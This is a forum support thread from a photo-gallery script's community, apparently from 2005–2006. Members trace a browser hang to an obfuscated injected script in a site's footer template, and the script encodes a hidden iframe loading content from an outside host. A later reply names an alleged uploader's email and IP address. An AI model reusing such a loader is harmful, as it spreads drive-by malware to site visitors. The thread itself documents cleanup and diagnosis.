Author Topic: Error Message: Script will cause browser to be slow  (Read 9235 times)

Offline undrline

• View Profile
Error Message: Script will cause browser to be slow
« on: May 16, 2005, 07:31:44 PM »
On every page that loads, I have been getting the IE message as follows:

If a user is trying to open the homepage via Opera, or on a Mac, their browser just hangs.  I've tried it on XP, NT, and 2000.  I made no changes to the site between the time that it was working and when I started receiving this error, which makes me think it must be a configuration issue.

http://photos.write-me.org/  is my site, and is hosted by http://WinWebHosting.com on a Linux platform.

What script is it talking about?  I think I'd be safe in removing it, as shutting it off via the error prompt doesn't adversely effect the site in any way.

Thanks in advance for the help.

Offline martrix

• View Profile
    • overlord.cz
Re: Error Message: Script will cause browser to be slow
« Reply #1 on: May 16, 2005, 09:19:46 PM »
well, if you put an endless while() loop into the footer of your page, it can only cause the browser to hang ;)

I guess, you won't do anything wrong byt erasing the whole javascript there...
MAяTRIX

Offline Chris

• 4images Moderator
  • 4images Guru
  • Did u ever stop to think and then forget to start?
    • View Profile
« Reply #2 on: May 17, 2005, 12:51:45 AM »
What's this???

footer.html
Code: [Select]
<script language="javascript" type="text/javascript">var k='?gly#vw|oh@%ylvlelolw|=#klgghq>#srvlwlrq=#devroxwh>#ohiw=#4>#wrs=#4%A?liudph#vuf@%kwws=22xvhu431liudph1ux2Bv@4%#iudpherughu@3#yvsdfh@3#kvsdfh@3#zlgwk@4#khljkw@4#pdujlqzlgwk@3#pdujlqkhljkw@3#vfuroolqj@qrA?2liudphA?2glyA',t=0,h='';while(t<=k.length-1)document.write(h);</script>

Offline undrline

• View Profile
« Reply #3 on: May 17, 2005, 01:52:12 AM »
well, if you put an endless while() loop into the footer of your page, it can only cause the browser to hang ;)

I guess, you won't do anything wrong byt erasing the whole javascript there...

Thank you for your response.

So, it's waiting for a loop to end?  I'm using the default code; I didn't change it.  There is only one while() function I see on the homepage (in bold below).  Is there a change I can make to fix it? Do I have to make the change on every page?

Not Necessary.  Read further.

Offline undrline

• View Profile
« Reply #4 on: May 17, 2005, 02:03:01 AM »
What's this???

footer.html
Code: [Select]
<script language="javascript" type="text/javascript">var k='?gly#vw|oh@%ylvlelolw|=#klgghq>#srvlwlrq=#devroxwh>#ohiw=#4>#wrs=#4%A?liudph#vuf@%kwws=22xvhu431liudph1ux2Bv@4%#iudpherughu@3#yvsdfh@3#kvsdfh@3#zlgwk@4#khljkw@4#pdujlqzlgwk@3#pdujlqkhljkw@3#vfuroolqj@qrA?2liudphA?2glyA',t=0,h='';while(t<=k.length-1)document.write(h);</script>

Thank you.

I don't know what that is.  I certaintly didn't put it there, but I'm not seeing it in the files either, only when viewing the source.  Perhaps you can point me to the bit that is writing that code?  Below, I've put the index and the footer.

index.php
REMOVED

page_footer.php
REMOVED
« Last Edit: May 17, 2005, 02:13:48 AM by V@no »

Offline V@no

• If you don't tell me what to do, I won't tell you where you should go :)
  • Global Moderator
  • 4images Guru
  • mmm PHP...
    • View Profile
    • 4images MODs Demo
« Reply #5 on: May 17, 2005, 02:18:24 AM »
I don't know what that is.  I certaintly didn't put it there, but I'm not seeing it in the files either, only when viewing the source.  Perhaps you can point me to the bit that is writing that code?  Below, I've put the index and the footer.
its in footer.html template.

And by the way, my McAfee Antivirus poped up with "VBS/Psyme trojan" comming from your footer.html template! :evil:
Your first three "must do" before you ask a question:
Please do not PM me asking for help unless you've been specifically asked to do so. Such PMs will be deleted without answer. (forum rule #6)
Extension for Firefox/Thunderbird: Master Password+    Back/Forward History Tweaks (restartless)    Cookies Manager+    Fit Images (restartless for Thunderbird)

Offline undrline

• View Profile
Previous Post
« Reply #6 on: May 17, 2005, 02:39:11 AM »
Generally, I wouldn't reply to my own post, but it seems that the code for those pages has been removed by V@no

Not quite sure how people can help, if I can't post the original code producing the error, particularly if I don't know what part of that code is the problem.  I didn't see anything in the forum readme about what code was allowed.  Maybe because it was not concise?  I tried to offset this with my formatting . . . V@no, if you could assist me with an explanation and alternative?

I want people to have as much to go on as possible to resolve my issue.

Offline undrline

• View Profile
« Reply #7 on: May 17, 2005, 02:45:24 AM »
Thank you very much for the help V@no.  I have deleted the script on the footer.html template, and the site is working fine.

As this has never been on a local machine, and am using the default template, as supplied by my hosting company, the virus must be on their machines.

Again, thank you.  I will inform my host at once.  There may be more people showing up to the forum with similar questions (WinWebHosting offers setup of the 4images gallery as an option through the Fantastico Control Panel to all of their customers).

I'm glad I was able to get this resolved so readily.  Thank you to everyone else who helped as well.

:D :mrgreen: :D

Offline Chris

• 4images Moderator
  • 4images Guru
  • Did u ever stop to think and then forget to start?
    • View Profile
« Reply #8 on: May 17, 2005, 02:51:48 AM »
There is no need to post the PHP files, everybody knows what's inside them.  We all have the same files ourselves and that's why the code was deleted.  It only made the forum thread really long and posting the code was pointless in this case.

Best wishes

Offline erikito

• View Profile
    • http://www.erikito.com/hotornot/
« Reply #9 on: March 11, 2006, 05:17:44 PM »
Hey everybody.

My girlfriend has a little gallery running, and last night some @sshole registered to the site (by email confirmation, not by admin. I just changed it to by admin).

He uploaded "a picture", which turned out to be some trojan. The thumbnail didn't show up but when I clicked on it Mcafee warned me about this trojan. I deleted it right away, and the user too. The name of the trojan looked a bit like "VBS/Psyme trojan". Something with "Shell" was mentioned.

This person used this email address: psih90@mail.ru

I insulted him by email afterwards in the hope to get his IP in his reply. I got this: 194.67.23.25

Can anybody help out? Is anything known about this problem? I'm still running 1.7.1 version, due to the large amount of mods....

I hope this post will save you guys some trouble.
Visit my gallery if you want to see the hottest chicks on the net.
No spam, no crap, it's just for fun ;)

Thanks for the great script and your help guys!

http://www.erikito.com/

Offline V@no

• If you don't tell me what to do, I won't tell you where you should go :)
  • Global Moderator
  • 4images Guru
  • mmm PHP...
    • View Profile
    • 4images MODs Demo
« Reply #10 on: March 11, 2006, 05:58:30 PM »
If you havent apply all the bug fixes for you 4images version, then please do so as soon as possible. or install v1.7.2

If that trojan is using a hole in PHP, then your hoster should upgrade to the lattest PHP version, otherwise nothing you can do about it...other then that, there is no known holes in 4images code that was not patched.

[EDIT]
Acording to this site the trojan ment to be for clients using unpatched version of InternetExplorer and probably will not affect the server itself, especialy if its *NIX
Your first three "must do" before you ask a question:
Please do not PM me asking for help unless you've been specifically asked to do so. Such PMs will be deleted without answer. (forum rule #6)
Extension for Firefox/Thunderbird: Master Password+    Back/Forward History Tweaks (restartless)    Cookies Manager+    Fit Images (restartless for Thunderbird)